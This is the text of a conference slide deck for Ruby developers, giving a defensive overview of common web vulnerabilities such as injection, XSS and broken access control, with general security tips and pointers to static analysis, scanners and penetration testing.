Link
Embed
Share
Beginning
This slide
Copy link URL
Copy link URL
Copy iframe embed code
Copy iframe embed code
Copy javascript embed code
Copy javascript embed code
Share
Tweet
Share
Tweet
Slide 1
Slide 1 text
GOOD MORNING RUBYFUZA ☕
Slide 2
Slide 2 text
RUAN BRANDÃO SOFTWARE ENGINEER AT MAGNETIS (WE ARE HIRING) TWITTER TIMELINE CURATOR @RUANBRANDAO /RUAN-BRANDAO
Slide 3
Slide 3 text
Photo by Rafaela Biazi on Unsplash
Slide 4
Slide 4 text
São Paulo
Slide 5
Slide 5 text
Paulínia - São Paulo
Slide 6
Slide 6 text
Pipa - Rio Grande do Norte
Slide 7
Slide 7 text
Made in "
Slide 8
Slide 8 text
CYBER ATTACKS
Slide 9
Slide 9 text
WEB VULNERABILITIES A FIELD GUIDE FOR
Slide 10
Slide 10 text
THE WEB HTTP HTTPS TLS SSL Databases Servers Credentials TCP/IP DNS Clusters Cache Browsers
Slide 11
Slide 11 text
USING COMPONENTS WITH KNOWN VULNERABILITIES
Slide 12
Slide 12 text
No content
Slide 13
Slide 13 text
UPDATE YOUR APPLICATION DEPENDENCIES Security tip #1
Slide 14
Slide 14 text
INJECTION ‣ SQL ‣ NOSQL ‣ CODE ‣ COMMANDS
Slide 15
Slide 15 text
INJECTION VULNERABILITIES ALLOW ATTACKERS TO RUN CODE ON YOUR APPLICATION SERVERS
Slide 16
Slide 16 text
SQL INJECTION
Slide 17
Slide 17 text
XKCD, available at https://xkcd.com/327/
Slide 18
Slide 18 text
No content
Slide 19
Slide 19 text
BE CAREFUL WITH THE ORDER METHOD
Slide 20
Slide 20 text
CODE INJECTION & COMMAND INJECTION
Slide 21
Slide 21 text
BE EXTRA CAREFUL WITH EVAL AND BACKTICKS
Slide 22
Slide 22 text
BE CAREFUL WITH CONSTANTIZE
Slide 23
Slide 23 text
CROSS SITE SCRIPTING (XSS)
Slide 24
Slide 24 text
CROSS SITE SCRIPTING ALLOWS ATTACKERS TO RUN CODE ON YOUR APPLICATION USERS BROWSERS
Slide 25
Slide 25 text
No content
Slide 26
Slide 26 text
No content
Slide 27
Slide 27 text
No content
Slide 28
Slide 28 text
RAILS DOES THE HARD WORK
Slide 29
Slide 29 text
BE CAREFUL WITH THE RAW AND HTML_SAFE
Slide 30
Slide 30 text
NEVER TRUST USER INPUT Security tip #2
Slide 31
Slide 31 text
BROKEN ACCESS CONTROL
Slide 32
Slide 32 text
No content
Slide 33
Slide 33 text
No content
Slide 34
Slide 34 text
No content
Slide 35
Slide 35 text
No content
Slide 36
Slide 36 text
BE CAREFUL WITH ACCESS TO SENSIBLE DATA Security tip #3
Slide 37
Slide 37 text
BROKEN AUTHENTICATION
Slide 38
Slide 38 text
DO NOT REINVENT THE WHEEL. UNLESS YOU REALLY, REALLY, KNOW WHAT YOU ARE DOING. Security tip #4
Slide 39
Slide 39 text
AND MUCH MORE… ‣ CROSS-SITE REQUEST FORGERY (CSRF) ‣ REMOTE CODE EXECUTION (RCE) ‣ SENSITIVE DATA EXPOSURE ‣ SECURITY MISCONFIGURATION
Slide 40
Slide 40 text
No content
Slide 41
Slide 41 text
Photo by Patrick Tomasso on Unsplash
Slide 42
Slide 42 text
https://owasp.org
Slide 43
Slide 43 text
No content
Slide 44
Slide 44 text
Photo by Barn Images on Unsplash
Slide 45
Slide 45 text
STATIC CODE ANALYSIS
Slide 46
Slide 46 text
No content
Slide 47
Slide 47 text
TOOLS STATIC CODE ANALYSIS TOOLS
Slide 48
Slide 48 text
TOOLS STATIC CODE ANALYSIS TOOLS
Slide 49
Slide 49 text
TOOLS STATIC CODE ANALYSIS TOOLS GitHub - Available at https://github.blog/2017-10-11-a-more-connected-universe/
Slide 50
Slide 50 text
SECURITY SCANNERS
Slide 51
Slide 51 text
TOOLS SECURITY SCANNER TOOLS http://www.arachni-scanner.com/
Slide 52
Slide 52 text
PENETRATION TESTS (PENTESTS)
Slide 53
Slide 53 text
SECURITY IS NOT A PRODUCT. SECURITY IS AN ONGOING PROCESS. Security tip #0
Slide 54
Slide 54 text
THANK YOU! ❤ @RUANBRANDAO /RUAN-BRANDAO